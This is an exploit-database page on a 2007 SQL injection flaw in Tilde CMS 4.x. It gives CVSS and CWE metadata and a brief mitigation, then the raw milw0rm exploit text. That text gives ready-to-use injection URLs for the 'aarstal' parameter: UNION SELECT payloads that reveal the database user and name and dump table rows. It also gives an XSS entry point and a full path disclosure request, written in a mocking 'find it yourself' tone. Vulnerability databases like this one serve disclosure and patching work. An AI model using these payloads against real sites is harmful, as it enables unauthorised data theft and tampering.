header-logo
Suggest Exploit
vendor:
Tilde CMS
by:
KiNgOfThEwOrLd
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Tilde CMS
Affected Version From: 4.x
Affected Version To: 4.x
Patch Exists: NO
Related CWE:
CPE: a:tilde_cms:tilde_cms:4.x
Metasploit:
Other Scripts:
Platforms Tested:

Tilde CMS <= v. 4.x "aarstal" parameter SQL Injection

The Tilde CMS version 4.x is vulnerable to SQL Injection in the "aarstal" parameter. An attacker can exploit this vulnerability to extract information from the database or manipulate database records. Additionally, the CMS is also vulnerable to XSS attacks and Full Path Disclosure.

Mitigation:

To mitigate this vulnerability, it is recommended to update Tilde CMS to the latest version. Additionally, input validation and parameterized queries should be implemented to prevent SQL Injection attacks.
Source

Exploit-DB raw data:

---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                         
---------------------------------------------------------------

Http://www.inj3ct-it.org 	     Staff[at]inj3ct-it[dot]org 

Original Here: http://www.inj3ct-it.org/exploit/tilde.txt

---------------------------------------------------------------

Tilde CMS <= v. 4.x "aarstal" parameter SQL Injection

---------------------------------------------------------------

#By KiNgOfThEwOrLd				

---------------------------------------------------------------
PoC

D'u need an explanation?!? i don't think so :P
---------------------------------------------------------------
SQL Injection

http://[target]/[tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=%27

Little examples

Using user() and database() functions u can get some informations about the 
database...as:

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]
&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*

Or u can get some recordes by the database like:

http://[target]/[tilde_path]/index.php?id=[id]
&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]
/**/from/**/[table_name]/*

D'u want the tables n' the rows? Find it yourself ;P
---------------------------------------------------------------
something else..

Xss Vulnerability

http://[target]/[tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=[XSS]
---------------------------------------------------------------
Full Path Disclosure

http://[target]/[tilde_path]/index.php?search=%
3C&mode=search&sider=on&tss=on&linier=on
---------------------------------------------------------------

# milw0rm.com [2007-11-26]